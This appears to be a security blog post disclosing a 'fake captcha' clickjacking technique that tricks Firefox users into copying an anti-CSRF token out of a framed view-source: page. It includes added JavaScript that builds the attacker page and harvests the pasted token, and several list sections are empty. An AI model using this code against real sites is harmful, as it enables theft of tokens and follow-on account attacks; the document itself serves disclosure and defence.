Cross domain content extraction with fake captcha

 

Content extraction is one of the recently documented UI redressing vectors. It exploits a Firefox vulnerability that allows the HTML source of any URL to be displayed in an iframe, like this:
 


With social engineering, the attacker tricks the user into selecting the (usually invisible) page source and dragging it to an attacker-controlled textarea. A simple demo is here:

 

Drag & drop other page source (cross-domain)

Once the attacker gets the page source dropped into his textarea, he can extract its contents (session IDs, user names, anti-CSRF tokens etc.) and launch further attacks.

However, this way of using the vector requires significant effort from the user and is pretty difficult to exploit in a real-world situation (there's some clicking and dragging involved). Also, it will stop working once Mozilla disallows cross-origin drag & drop.

I've found a neat way to do cross-origin content extraction that might be more suitable for some classes of websites. Ladies and gentlemen, let me present Fake Captcha:
 

NO MORE DRAG

The weak point of the 'classic' method for me was the dragging that was involved. In Firefox, once you drag something, it displays a shadow of the dragged object at the cursor, and a whole HTML source being displayed to the user is really hard to hide. I decided to convince the user to copy & paste the source with his clipboard instead.

Copying & pasting requires four steps:
 

  1. selecting the text to copy

  2. ctrl-c

  3. navigating to target element

  4. ctrl-v

Each of these steps requires user intervention. I could make a game/quiz that requires certain keypresses, but that's weak (although it works for Facebook users). Instead, I wanted it to feel natural for the user. Nothing is hidden and he just uses the clipboard because he wants to.
 

SO, WHEN DO YOU USE A CLIPBOARD?

Well, I don't like typing. So every time I'm forced to repeat my e-mail address in a form, I just copy-paste it. I decided to go that way. What if we display a longish captcha-like 'security code' for the user to retype? 16 characters or more? Some users will skip this step altogether, some will retype it, but most will select the text and copy/paste.

 

HOW DO YOU SELECT?

You can select with your mouse. In Firefox, you can also select by double / triple clicking. My assumption is that most users use the clicking method to select text.

A double click stops at a word boundary; a third click expands the selection to the whole paragraph (try this text). In the above example, you need three clicks to select the whole visible code. Why do we care?
 

I'M FRAMED!

Because the security code input field is just a precisely positioned part of the view-source:'d victim page. And by triple clicking, the user selects the whole line from the page source!

 

DEMO

It's best to see the demo to understand what's going on. We want to extract the anti-CSRF token from the victim page cross-domain. The token is in the page source, on line 7:
 

 1  <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
 2  <html>
 3  <head>
 4  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 5  <title>NDCP</title>
 6  <script type="text/javascript">
 7  var csrf_token = '35fb6df6-2ab9-408b-abe3-769412a58e15';
 8  </script>
 9  <style>
10  body {
11      background: url(nuke.jpg) left top repeat;
12      color: white;
13      font-family: Verdana, arial, sans-serif;
14  }
15  // and so on


So we display the source in a small frame, positioned so that only a few characters are visible, starting from line 7, column 19 (the first character of the token). Then we convince the user to select the whole line with a triple click: a double click stops at the first minus sign inside the token, so the user will probably click a third time to select everything.
After selecting, he copies, clicks the next field and pastes. Then we're done.
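As an added example (not code from the original post or its demo), the JavaScript below models the steps of this section against the victim source listed above: finding the token's line and column, what a double click versus a triple click selects on that line, the frame offsets needed to expose only the token, the attacker page markup around a view-source: iframe, and the harvesting step once the victim has pasted. The view-source: iframe relies on the Firefox behaviour the post describes (since fixed); the pixel metrics, the victim URL and the UUID shape of the token are assumptions.

```javascript
// Added example, not from the original post. Models the fake-captcha
// extraction against the victim source shown in the listing. The iframe
// trick depends on the Firefox bug the post describes; pixel metrics,
// the victim URL and the UUID-shaped token are assumptions.

// Constructed copy of the first lines of the victim page source above.
// '<\/script>' is the same text as '</script>'; escaped so the string is
// safe to paste into an inline <script> as well.
const VICTIM_SOURCE = [
  '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">',
  '<html>',
  '<head>',
  '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">',
  '<title>NDCP</title>',
  '<script type="text/javascript">',
  "var csrf_token = '35fb6df6-2ab9-408b-abe3-769412a58e15';",
  '<\/script>',
].join('\n');

// 1-based line and column of the first occurrence of `needle` in `source`.
function locate(source, needle) {
  const lines = source.split('\n');
  for (let i = 0; i < lines.length; i++) {
    const col = lines[i].indexOf(needle);
    if (col !== -1) return { line: i + 1, column: col + 1 };
  }
  return null;
}

// What a double click at `column` selects: the run of word characters
// around the click. '-' is a word boundary, so a click on the UUID only
// grabs one dash-separated group, which is why a third click is needed.
function doubleClickSelection(lineText, column) {
  const isWord = (ch) => /[A-Za-z0-9_]/.test(ch);
  let start = column - 1;
  let end = column - 1;
  if (!isWord(lineText[start])) return '';
  while (start > 0 && isWord(lineText[start - 1])) start--;
  while (end < lineText.length - 1 && isWord(lineText[end + 1])) end++;
  return lineText.slice(start, end + 1);
}

// What a triple click selects in view-source: the whole line.
function tripleClickSelection(source, line) {
  return source.split('\n')[line - 1];
}

// Negative offsets that shift the framed source so that (line, column)
// lands at the top-left corner of the clipping window. Assumes a
// monospace font with these metrics (assumption: measure the real target).
function frameOffsets(line, column, lineHeightPx, charWidthPx) {
  return {
    top: -(line - 1) * lineHeightPx,
    left: -(column - 1) * charWidthPx,
  };
}

// Attacker page: a clipping div around the view-source: frame, showing
// only `visibleChars` characters of the target line, plus the "security
// code" field the victim is asked to retype into. victimUrl is hypothetical.
function attackerPage(victimUrl, line, column, lineHeightPx, charWidthPx, visibleChars) {
  const { top, left } = frameOffsets(line, column, lineHeightPx, charWidthPx);
  return [
    `<div style="overflow:hidden;width:${visibleChars * charWidthPx}px;height:${lineHeightPx}px">`,
    `  <iframe src="view-source:${victimUrl}" scrolling="no" frameborder="0"`,
    `          style="border:0;width:2000px;height:2000px;margin-top:${top}px;margin-left:${left}px"></iframe>`,
    '</div>',
    '<input type="text" name="code" placeholder="retype the security code">',
  ].join('\n');
}

// Harvest step: whatever the victim pasted (usually the whole line 7),
// pull out the UUID-shaped token, or null if the paste did not contain one.
function extractToken(pasted) {
  const m = /[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/i.exec(pasted);
  return m ? m[0] : null;
}
```

In practice the font metrics must be measured against the real view-source: rendering of the target browser, and the clipping window is sized to show just the beginning of the token so that the rest of the line stays out of view while the triple click still grabs all of it.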
 

DETAILS MATTER

See the source to appreciate all the small but very important details, especially:
 

HOW NOT TO GET OWNED?

SUMMARY

There's a new 'fake captcha' method of using the content extraction UI redressing vector.

Pros:
 

Cons:
 

You might find the requirements very limiting. I also thought it was simply impossible to exploit in real life. Until I started looking - wait for the next post :)

Update: The latest NoScript (2.1.2+) contains code neutralizing the fake captcha method. Yet another great piece of work by Giorgio Maone!

Update 2: Fake CAPTCHA technique spotted in the wild to extract Facebook CSRF tokens.